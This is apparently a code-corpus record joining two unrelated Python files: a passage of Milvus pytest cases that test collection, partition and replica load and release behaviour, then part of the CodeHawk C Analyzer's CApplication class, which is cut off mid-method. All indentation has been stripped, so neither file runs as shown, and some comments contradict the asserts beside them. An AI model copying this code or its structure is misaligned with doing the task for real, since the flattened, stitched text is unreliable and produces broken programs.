def test_release_collection_not_load(self):
"""
target: test release collection without load
method: release collection without load
expected: release successfully
"""
self._connect()
c_name = cf.gen_unique_str()
collection_wr = self.init_collection_wrap(name=c_name)
collection_wr.release()
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_load_release(self):
"""
target: test load collection after load and release
method: 1.load and release collection after entities flushed
2.re-load collection
expected: No exception
"""
self._connect()
collection_w = self.init_collection_wrap()
insert_data = cf.gen_default_list_data()
collection_w.insert(data=insert_data)
assert collection_w.num_entities == ct.default_nb
collection_w.load()
collection_w.release()
collection_w.load()
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_repeatedly(self):
"""
target: test load collection repeatedly
method: load collection twice
expected: No exception
"""
self._connect()
collection_w = self.init_collection_wrap()
insert_data = cf.gen_default_list_data()
collection_w.insert(data=insert_data)
assert collection_w.num_entities == ct.default_nb
collection_w.load()
collection_w.load()
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_collection(self):
"""
target: test load, release non-exist collection
method: 1. load, release and drop collection
2. load and release dropped collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str()
collection_wr = self.init_collection_wrap(name=c_name)
collection_wr.load()
collection_wr.release()
collection_wr.drop()
error = {ct.err_code: 0,
ct.err_msg: "DescribeCollection failed: can't find collection: %s" % c_name}
collection_wr.load(check_task=CheckTasks.err_res, check_items=error)
collection_wr.release(check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_after_drop(self):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str()
collection_wr = self.init_collection_wrap(name=c_name)
collection_wr.load()
collection_wr.drop()
error = {ct.err_code: 0,
ct.err_msg: "DescribeCollection failed: can't find collection: %s" % c_name}
collection_wr.release(check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_load_partitions_release_collection(self):
"""
target: test release collection after load partitions
method: insert entities into partitions, load partitions and release collection
expected: search result empty
"""
self._connect()
collection_w = self.init_collection_wrap()
patition_w = self.init_partition_wrap(collection_wrap=collection_w, name=ct.default_tag)
data = cf.gen_default_list_data()
collection_w.insert(data=data, partition_name=ct.default_tag)
assert collection_w.num_entities == ct.default_nb
patition_w.load()
collection_w.release()
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_number_replicas(self, request):
if request.param == 1:
pytest.skip("1 is valid replica number")
if request.param is None:
pytest.skip("None is valid replica number")
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_replica_non_number(self, get_non_number_replicas):
"""
target: test load collection with non-number replicas
method: load with non-number replicas
expected: raise exceptions
"""
# create, insert
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
insert_res, _ = collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
# load with non-number replicas
error = {ct.err_code: 0, ct.err_msg: f"but expected one of: int, long"}
collection_w.load(replica_number=get_non_number_replicas, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("replicas", [-1, 0, None])
def test_load_replica_invalid_number(self, replicas):
"""
target: test load partition with invalid replica number
method: load with invalid replica number
expected: raise exception
"""
# create, insert
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
insert_res, _ = collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
collection_w.load(replica_number=replicas)
replicas = collection_w.get_replicas()[0]
groups = replicas.groups
assert len(groups) == 1
assert len(groups[0].shards) == 2
@pytest.mark.tags(CaseLabel.L2)
def test_load_replica_greater_than_querynodes(self):
"""
target: test load with replicas that greater than querynodes
method: load with 3 replicas (2 querynode)
expected: Raise exception
"""
# create, insert
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
insert_res, _ = collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
error = {ct.err_code: 1, ct.err_msg: f"no enough nodes to create replicas"}
collection_w.load(replica_number=3, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_load_replica_change(self):
"""
target: test load replica change
method: 1.load with replica 1
2.load with a new replica number
3.release collection
4.load with a new replica
expected: The second time successfully loaded with a new replica number
"""
# create, insert
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
insert_res, _ = collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
collection_w.load(replica_number=1)
collection_w.query(expr=f"{ct.default_int64_field_name} in [0]")
# verify load different replicas thrown an exception
error = {ct.err_code: 5, ct.err_msg: f"Should release first then reload with the new number of replicas"}
collection_w.load(replica_number=2, check_task=CheckTasks.err_res, check_items=error)
one_replica, _ = collection_w.get_replicas()
assert len(one_replica.groups) == 1
collection_w.release()
collection_w.load(replica_number=2)
two_replicas, _ = collection_w.get_replicas()
assert len(two_replicas.groups) == 2
collection_w.query(expr=f"{ct.default_int64_field_name} in [0]", check_task=CheckTasks.check_query_results,
check_items={'exp_res': [{'int64': 0}]})
# verify loaded segments included 2 replicas and twice num entities
seg_info, _ = self.utility_wrap.get_query_segment_info(collection_w.name)
seg_ids = list(map(lambda seg: seg.segmentID, seg_info))
num_entities = list(map(lambda seg: seg.num_rows, seg_info))
assert reduce(lambda x, y: x ^ y, seg_ids) == 0
assert reduce(lambda x, y: x + y, num_entities) == ct.default_nb * 2
@pytest.mark.tags(CaseLabel.L2)
def test_load_replica_multi(self):
"""
target: test load with multiple replicas
method: 1.create collection with one shards
2.insert multiple segments
3.load with multiple replicas
4.query and search
expected: Query and search successfully
"""
# create, insert
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=1)
tmp_nb = 1000
replica_number = 2
for i in range(replica_number):
df = cf.gen_default_dataframe_data(nb=tmp_nb, start=i * tmp_nb)
insert_res, _ = collection_w.insert(df)
assert collection_w.num_entities == (i + 1) * tmp_nb
collection_w.load(replica_number=replica_number)
replicas = collection_w.get_replicas()[0]
assert len(replicas.groups) == replica_number
query_res, _ = collection_w.query(expr=f"{ct.default_int64_field_name} in [0, {tmp_nb}]")
assert len(query_res) == 2
search_res, _ = collection_w.search(vectors, default_search_field, default_search_params, default_limit)
assert len(search_res[0]) == ct.default_limit
@pytest.mark.tags(CaseLabel.L2)
def test_load_replica_partitions(self):
"""
target: test load replica with partitions
method: 1.Create collection and one partition
2.Insert data into collection and partition
3.Load multi replicas with partition
4.Query
expected: Verify query result
"""
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix))
df_1 = cf.gen_default_dataframe_data(nb=default_nb)
df_2 = cf.gen_default_dataframe_data(nb=default_nb, start=default_nb)
collection_w.insert(df_1)
partition_w = self.init_partition_wrap(collection_w, ct.default_tag)
partition_w.insert(df_2)
assert collection_w.num_entities == ct.default_nb * 2
collection_w.load([partition_w.name], replica_number=2)
# default tag query 0 empty
collection_w.query(expr=f"{ct.default_int64_field_name} in [0]", partition_names=[ct.default_tag],
check_tasks=CheckTasks.check_query_empty)
# default query 0 empty
collection_w.query(expr=f"{ct.default_int64_field_name} in [3000]",
check_task=CheckTasks.check_query_results,
check_items={'exp_res': df_2.iloc[:1, :1].to_dict('records')})
error = {ct.err_code: 1, ct.err_msg: f"not loaded into memory"}
collection_w.query(expr=f"{ct.default_int64_field_name} in [0]",
partition_names=[ct.default_partition_name, ct.default_tag],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L3)
def test_load_replica_non_shard_leader(self):
"""
target: test replica groups which one of QN is not shard leader
method: 1.deploy cluster with 5 QNs
2.create collection with 2 shards
3.insert and flush
4.load with 2 replica number
5.insert growng data
6.search and query
expected: Verify search and query results
"""
# create and insert entities
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=2)
df = cf.gen_default_dataframe_data()
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
# load with multi replica and insert growing data
collection_w.load(replica_number=2)
df_growing = cf.gen_default_dataframe_data(100, start=ct.default_nb)
collection_w.insert(df_growing)
replicas = collection_w.get_replicas()[0]
# verify there are 2 groups (2 replicas)
assert len(replicas.groups) == 2
log.debug(replicas)
for group in replicas.groups:
# verify each group have 3 shards
assert len(group.shards) == 2
shard_leaders = []
# verify one group has 3 querynodes, and one of the querynode isn't shard leader
if len(group.group_nodes) == 3:
for shard in group.shards:
shard_leaders.append(shard.shard_leader)
assert len(shard_leaders) == 2
# Verify 2 replicas segments loaded
seg_info, _ = self.utility_wrap.get_query_segment_info(collection_w.name)
seg_ids = list(map(lambda seg: seg.segmentID, seg_info))
assert reduce(lambda x, y: x ^ y, seg_ids) == 0
# verify search successfully
res, _ = collection_w.search(vectors, default_search_field, default_search_params, default_limit)
assert len(res[0]) == ct.default_limit
# verify query sealed and growing data successfully
collection_w.query(expr=f"{ct.default_int64_field_name} in [0, {ct.default_nb}]",
check_task=CheckTasks.check_query_results,
check_items={'exp_res': [{'int64': 0}, {'int64': 3000}]})
@pytest.mark.tags(CaseLabel.L3)
def test_load_replica_multiple_shard_leader(self):
"""
target: test replica groups which one of QN is shard leader of multiple shards
method: 1.deploy cluster with 5 QNs
2.create collection with 3 shards
3.insert and flush
4.load with 2 replica number
5.insert growng data
6.search and query
expected: Verify search and query results
"""
# craete and insert
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=3)
df = cf.gen_default_dataframe_data()
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
# load with multi replicas and insert growing data
collection_w.load(replica_number=2)
df_growing = cf.gen_default_dataframe_data(100, start=ct.default_nb)
collection_w.insert(df_growing)
# verify replica infos
replicas, _ = collection_w.get_replicas()
log.debug(replicas)
assert len(replicas.groups) == 2
for group in replicas.groups:
# verify each group have 3 shards
assert len(group.shards) == 3
# verify one group has 2 querynodes, and one of the querynode subscripe 2 dml channel
shard_leaders = []
if len(group.group_nodes) == 2:
for shard in group.shards:
shard_leaders.append(shard.shard_leader)
assert len(shard_leaders) == 3 and len(set(shard_leaders)) == 2
# Verify 2 replicas segments loaded
seg_info, _ = self.utility_wrap.get_query_segment_info(collection_w.name)
seg_ids = list(map(lambda seg: seg.segmentID, seg_info))
assert reduce(lambda x, y: x ^ y, seg_ids) == 0
# Verify search successfully
res, _ = collection_w.search(vectors, default_search_field, default_search_params, default_limit)
assert len(res[0]) == ct.default_limit
# Verify query sealed and growing entities successfully
collection_w.query(expr=f"{ct.default_int64_field_name} in [0, {ct.default_nb}]",
check_task=CheckTasks.check_query_results,
check_items={'exp_res': [{'int64': 0}, {'int64': 3000}]})
# https://github.com/milvus-io/milvus/issues/16726
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_replicas_not_loaded(self):
"""
target: test get replicas of not loaded collection
method: not loaded collection and get replicas
expected: raise an exception
"""
# create, insert
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
insert_res, _ = collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
collection_w.get_replicas(check_task=CheckTasks.err_res,
check_items={"err_code": 15, "err_msg": "getCollectionInfoByID: can't find collectionID"})
class TestReleaseAdvanced(TestcaseBase):
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching(self):
"""
target: test release collection during searching
method: insert entities into collection, flush and load collection, release collection during searching
expected: raise exception
"""
self._connect()
data = cf.gen_default_list_data()
c_name = cf.gen_unique_str()
collection_wr = self.init_collection_wrap(name=c_name)
collection_wr.insert(data=data)
assert collection_wr.num_entities == ct.default_nb
collection_wr.load()
search_res, _ = collection_wr.search(vectors, default_search_field, default_search_params,
default_limit, _async=True)
collection_wr.release()
error = {ct.err_code: 1, ct.err_msg: 'collection %s was not loaded into memory' % c_name}
collection_wr.search(vectors, default_search_field, default_search_params, default_limit,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_during_searching(self):
"""
target: test release partition during searching
method: insert entities into partition, flush and load partition, release partition during searching
expected: raise exception
"""
self._connect()
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 10, partition_num, is_index=True)[0]
par = collection_w.partitions
par_name = par[partition_num].name
par[partition_num].load()
limit = 10
collection_w.search(vectors, default_search_field,
default_search_params, limit, default_search_exp,
[par_name])
par[partition_num].release()
collection_w.search(vectors, default_search_field,
default_search_params, limit, default_search_exp,
[par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "partition has been released"})
@pytest.mark.tags(CaseLabel.L0)
def test_release_indexed_collection_during_searching(self):
"""
target: test release indexed collection during searching
method: insert entities into partition, flush and load partition, release collection during searching
expected: raise exception
"""
self._connect()
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 10, partition_num, is_index=True)[0]
par = collection_w.partitions
par_name = par[partition_num].name
par[partition_num].load()
limit = 10
collection_w.search(vectors, default_search_field,
default_search_params, limit, default_search_exp,
[par_name], _async=True)
collection_w.release()
error = {ct.err_code: 1, ct.err_msg: 'collection %s was not loaded into memory' % collection_w.name}
collection_w.search(vectors, default_search_field,
default_search_params, limit, default_search_exp,
[par_name],
check_task=CheckTasks.err_res,
check_items=error)
class TestLoadPartition(TestcaseBase):
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in cpu mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request):
log.info(request.param)
if request.param["index_type"] in ct.binary_support:
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.mark.tags(CaseLabel.L0)
def test_load_partition_after_index_binary(self, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
self._connect()
partition_num = 1
collection_w = self.init_collection_general(prefix, True, ct.default_nb, partition_num,
is_binary=True, is_index=True)[0]
for metric_type in ct.binary_metrics:
log.info(metric_type)
get_binary_index["metric_type"] = metric_type
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in ct.structure_metrics:
error = {ct.err_code: -1, ct.err_msg: 'Invalid metric_type: SUBSTRUCTURE, '
'which does not match the index type: %s' % metric_type}
collection_w.create_index(ct.default_binary_vec_field_name, get_binary_index,
check_task=CheckTasks.err_res, check_items=error)
else:
collection_w.create_index(ct.default_binary_vec_field_name, get_binary_index)
par = collection_w.partitions
par[partition_num].load()
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_dis_connect(self):
"""
target: test load partition, without connection
method: load partition with correct params, with a disconnected instance
expected: load raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
description = cf.gen_unique_str("desc_")
partition_w = self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
partition_w.load()
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first.'}
partition_w.load(check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_dis_connect(self, connect, dis_connect, collection):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
description = cf.gen_unique_str("desc_")
partition_w = self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
partition_w.load()
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first.'}
partition_w.release(check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_not_existed(self, connect, collection):
"""
target: test load partition for invalid scenario
method: load not existed partition
expected: raise exception and report the error
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
description = cf.gen_unique_str("desc_")
partition_w = self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
partition_w.drop()
error = {ct.err_code: 0, ct.err_msg: 'partitionID of partitionName:%s can not be find' % partition_name}
partition_w.load(check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_not_load(self):
"""
target: test release partition without load
method: release partition without load
expected: release success
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
description = cf.gen_unique_str("desc_")
partition_w = self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
partition_w.release()
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_after_drop(self, connect, collection):
"""
target: test load and release partition after drop
method: drop partition and then load and release it
expected: raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
description = cf.gen_unique_str("desc_")
partition_w = self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
partition_w.drop()
error = {ct.err_code: 0, ct.err_msg: 'partitionID of partitionName:%s can not be find' % partition_name}
partition_w.load(check_task=CheckTasks.err_res, check_items=error)
partition_w.release(check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
description = cf.gen_unique_str("desc_")
partition_w = self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
partition_w.drop()
error = {ct.err_code: 0, ct.err_msg: 'partitionID of partitionName:%s can not be find' % partition_name}
partition_w.release(check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_load_release_after_collection_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
name = collection_w.name
partition_name = cf.gen_unique_str(prefix)
description = cf.gen_unique_str("desc_")
partition_w = self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
collection_w.drop()
error = {ct.err_code: 0, ct.err_msg: "HasPartition failed: can\'t find collection: %s" % name}
partition_w.load(check_task=CheckTasks.err_res, check_items=error)
partition_w.release(check_task=CheckTasks.err_res, check_items=error)
|
CApplication.py | # ------------------------------------------------------------------------------
# CodeHawk C Analyzer
# Author: Henny Sipma
# ------------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2017-2020 Kestrel Technology LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ------------------------------------------------------------------------------
from typing import Any, Callable, Dict, Iterable, List, Optional, TYPE_CHECKING
import os
import logging
import multiprocessing
import sys
import chc.util.fileutil as UF
from chc.api.CGlobalContract import CGlobalContract
from chc.app.CCompInfo import CCompInfo
from chc.app.CFile import CFile
from chc.app.CVarInfo import CVarInfo
from chc.app.IndexManager import IndexManager
from chc.app.CGlobalDeclarations import CGlobalDeclarations
from chc.source.CSrcFile import CSrcFile
if TYPE_CHECKING:
from chc.app.CFunction import CFunction
class CApplication(object):
"""Primary access point for source code and analysis results."""
def __init__(
self,
path: str,
cfilename: Optional[str] = None,
srcpath: Optional[str] = None,
contractpath: Optional[str] = None,
candidate_contractpath: Optional[str] = None,
excludefiles: List[str] = [],
includefiles: Optional[List[str]] = None,
) -> None:
self.singlefile = not (cfilename is None)
self.path = UF.get_chc_artifacts_path(path)
self.srcpath = os.path.join(path, "sourcefiles") if srcpath is None else srcpath
self.contractpath = contractpath
self.globalcontract = None
self.excludefiles = excludefiles # files analyzed: all excluding these
# files analyzed (if not None): these
self.includefiles = includefiles
if self.contractpath is not None:
self.globalcontract = CGlobalContract(self)
self.candidate_contractpath = candidate_contractpath
self.filenames: Dict[int, str] = {} # file index -> filename
self.files: Dict[str, CFile] = {} # filename -> CFile
if self.singlefile:
self.declarations = None # TBD: set to CFileDeclarations
else:
self.declarations = CGlobalDeclarations(self)
self.indexmanager = IndexManager(self.singlefile)
self.callgraph: Dict[Any, Any] = {} # (fid,vid) -> (callsitespos, (tgtfid,tgtvid))
self.revcallgraph: Dict[Any, Any] = {} # (tgtfid,tgtvid) -> ((fid,vid),callsitespos)
self._initialize(cfilename)
def get_filenames(self) -> Iterable[str]:
return self.filenames.values()
"""Returns true if name is a base filename."""
def is_application_header(self, name: str) -> bool:
for n in self.get_filenames():
if name == os.path.basename(n[:-2]):
return True
else:
return False
def get_max_filename_length(self) -> int:
return max([len(x) for x in self.get_filenames()])
def get_filename_dictionary(self) -> Dict[str, List[str]]:
result: Dict[str, List[str]] = {}
for f in self.get_files():
result[f.name] = []
for fn in f.get_functions():
result[f.name].append(fn.name)
return result
def get_files(self) -> Iterable[CFile]:
self._initialize_files()
return sorted(self.files.values(), key=lambda x: x.name)
def has_single_file(self) -> bool:
return 0 in self.filenames
# return file from single-file application
def get_single_file(self) -> CFile:
if 0 in self.filenames:
return self.files[self.filenames[0]]
else:
tgtxnode = UF.get_targetfiles_xnode(self.path)
if not tgtxnode:
raise UF.CHCSingleCFileNotFoundError([])
filenames = [(c.get("name") or "") for c in tgtxnode.findall("c-file")]
raise UF.CHCSingleCFileNotFoundError(filenames)
def get_cfile(self) -> CFile:
if self.singlefile:
return self.get_single_file()
raise UF.CHCSingleCFileNotFoundError([])
def get_file(self, fname: str) -> CFile:
self._initialize_files()
index = self.get_file_index(fname)
self._initialize_file(index, fname)
if fname in self.files:
return self.files[fname]
raise Exception("Could not find file \"" + fname + "\"")
def get_file_by_index(self, index: int) -> CFile:
if index in self.filenames:
return self.get_file(self.filenames[index])
raise Exception("Could not find file with index \"" + str(index) + "\"")
def get_file_index(self, fname: str) -> int:
for i in self.filenames:
if self.filenames[i] == fname:
return i
raise Exception("Could not find file named \"" + fname + "\"")
def get_srcfile(self, fname: str) -> CSrcFile:
srcfile = os.path.join(self.srcpath, fname)
return CSrcFile(self, srcfile)
# return a list of ((fid,vid),callsitespos).
def get_callsites(self, fid, vid):
self._initialize_callgraphs()
if (fid, vid) in self.revcallgraph:
return self.revcallgraph[(fid, vid)]
return []
def iter_files(self, f: Callable[[CFile], None]) -> None:
for file in self.get_files():
f(file)
def iter_files_parallel(self, f: Callable[[CFile], None], processes: int) -> None:
for fname in self.get_files():
while len(multiprocessing.active_children()) >= processes:
pass
multiprocessing.Process(target=f, args=(fname,)).start()
while len(multiprocessing.active_children()) > 0:
pass
def iter_filenames(self, f: Callable[[str], None]) -> None:
for fname in self.filenames.values():
f(fname)
def iter_filenames_parallel(self, f: Callable[[str], None], processes: int) -> None:
for fname in self.filenames.values():
while len(multiprocessing.active_children()) >= processes:
pass
multiprocessing.Process(target=f, args=(fname,)).start()
while len(multiprocessing.active_children()) > 0:
pass
def iter_functions(self, f: Callable[["CFunction"], None]) -> None:
def g(fi: CFile) -> None:
fi.iter_functions(f)
self.iter_files(g)
def iter_functions_parallel(self, f: Callable[["CFunction"], None], maxprocesses: int) -> None:
def g(fi: CFile) -> None:
fi.iter_functions(f)
self.iter_files_parallel(g, maxprocesses)
def resolve_vid_function(self, fid, vid):
msg = "resolve-vid-function(" + str(fid) + "," + str(vid) + "):"
result = self.indexmanager.resolve_vid(fid, vid)
if result is not None:
tgtfid = result[0]
tgtvid = result[1]
if tgtfid in self.filenames:
filename = self.filenames[tgtfid]
self._initialize_file(tgtfid, filename)
if not self.files[filename] is None:
return self.files[filename].get_function_by_index(tgtvid)
logging.warning(msg + "Filename not found: " + filename)
return None
logging.warning(msg + "Target fid " + str(tgtfid) + " not found")
return None
logging.warning(msg + "Unable to resolve")
def convert_vid(self, fidsrc, vid, fidtgt):
return self.indexmanager.convert_vid(fidsrc, vid, fidtgt)
def get_gckey(self, fid, ckey):
return self.indexmanager.get_gckey(fid, ckey)
def get_function_by_index(self, index):
for f in self.files:
if self.files[f].has_function_by_index(index):
return self.files[f].get_function_by_index(index)
else:
print("No function found with index " + str(index))
# exit(1)
def get_callinstrs(self):
result = []
def f(fi):
result.extend(fi.getcallinstrs())
self.iter_files(f)
return result
def get_externals(self):
result = {}
for e in self.xnode.find("global-definitions").find("external-varinfos"):
vfile = e.get("vfile")
vname = e.get("vname")
summarized = e.get("summarized")
if vfile not in result:
result[vfile] = []
result[vfile].append((vname, summarized))
return result
def get_compinfo(self, fileindex, ckey):
return self.get_file_by_index(fileindex).get_compinfo(ckey)
def get_global_compinfos(self):
return self.declarations.compinfo_table.values()
def get_file_compinfos(self):
result = []
def f(f):
result.extend(f.declarations.getcompinfos())
self.fileiter(f)
return result
def get_file_global_varinfos(self):
result = []
def f(f):
result.extend(f.declarations.get_global_varinfos())
self.fileiter(f)
return result
# ------------------- Application statistics -----------------------------
def get_line_counts(self):
counts = {}
def f(cfile):
decls = cfile.declarations
counts[cfile.name] = (
decls.get_max_line(),
decls.get_code_line_count(),
decls.get_function_count(),
)
self.iter_files(f)
flen = self.get_max_filename_length()
lines = []
lines.append(
"file".ljust(flen)
+ "LOC".rjust(12)
+ "CLOC".rjust(12)
+ "functions".rjust(12)
)
lines.append("-" * (flen + 36))
for (c, (ml, mc, fc)) in sorted(counts.items()):
lines.append(
c.ljust(flen)
+ str(ml).rjust(12)
+ str(mc).rjust(12)
+ str(fc).rjust(12)
)
lines.append("-" * (flen + 36))
mltotal = sum(x[0] for x in counts.values())
mctotal = sum(x[1] for x in counts.values())
fctotal = sum(x[2] for x in counts.values())
lines.append(
"total".ljust(flen)
+ str(mltotal).rjust(12)
+ str(mctotal).rjust(12)
+ str(fctotal).rjust(12)
)
return "\n".join(lines)
def get_project_counts(self, filefilter=lambda f: True):
linecounts = []
clinecounts = []
cfuncounts = []
def f(cfile):
if filefilter(cfile.name):
decls = cfile.declarations
linecounts.append(decls.get_max_line())
clinecounts.append(decls.get_code_line_count())
cfuncounts.append(decls.get_function_count())
self.iter_files(f)
return (sum(linecounts), sum(clinecounts), sum(cfuncounts))
def update_spos(self):
"""Create supporting proof obligations for all call sites."""
def f(fn):
fn.update_spos()
fn.save_spos()
fn.save_pod()
def h(cfile):
cfile.iter_functions(f)
cfile.save_predicate_dictionary()
cfile.save_interface_dictionary()
cfile.save_declarations()
self.iter_files(h)
def collect_post_assumes(self):
"""For all call sites collect postconditions from callee's contracts and add as assume."""
self.iter_files(lambda f: f.collect_post_assumes())
def distribute_post_guarantees(self):
"""add callee postcondition guarantees to call sites as assumptions"""
if self.contractpath is None:
return # no contracts provided
def f(fn):
fn.distribute_post_guarantees()
fn.save_spos()
fn.save_pod()
def h(cfile):
cfile.iter_functions(f)
cfile.save_predicate_dictionary()
cfile.save_interface_dictionary()
cfile.save_declarations()
self.iter_files(h)
def reinitialize_tables(self):
def f(fi):
fi.reinitialize_tables()
self.iter_files(f)
# reload ppos after analyzer checks
def reload_ppos(self):
def f(fn):
fn.reload_ppos()
self.iter_functions(f)
# reload spos after analyzer invariant generation and analyzer checks
def reload_spos(self):
def f(fn):
fn.reload_spos()
self.iter_functions(f)
def get_contract_condition_violations(self):
result = []
def f(fn):
if fn.violates_contract_conditions():
result.append((fn.name, fn.get_contract_condition_violations()))
self.iter_functions(f)
return result
def get_ppos(self):
result = []
def f(fn):
result.extend(fn.get_ppos())
self.iter_functions(f)
return result
def get_spos(self):
result = []
def f(fn):
result.extend(fn.get_spos())
self.iter_functions(f)
return result
def get_open_ppos(self):
result = []
def f(fn):
result.extend(fn.get_open_ppos())
self.iter_functions(f)
return result
def get_violations(self):
result = []
def f(fn):
result.extend(fn.get_violations())
self.iter_functions(f)
return result
def get_delegated(self):
result = []
def f(fn):
result.extend(fn.get_delegated())
self.iter_functions(f)
return result
def _initialize(self, fname: Optional[str]) -> None:
if fname is None:
# read target_files.xml file to retrieve application files
tgtxnode = UF.get_targetfiles_xnode(self.path)
if tgtxnode is None:
raise UF.CHCXmlParseError(self.path, 0, (0, 0))
if self.includefiles is None:
for c in tgtxnode.findall("c-file"):
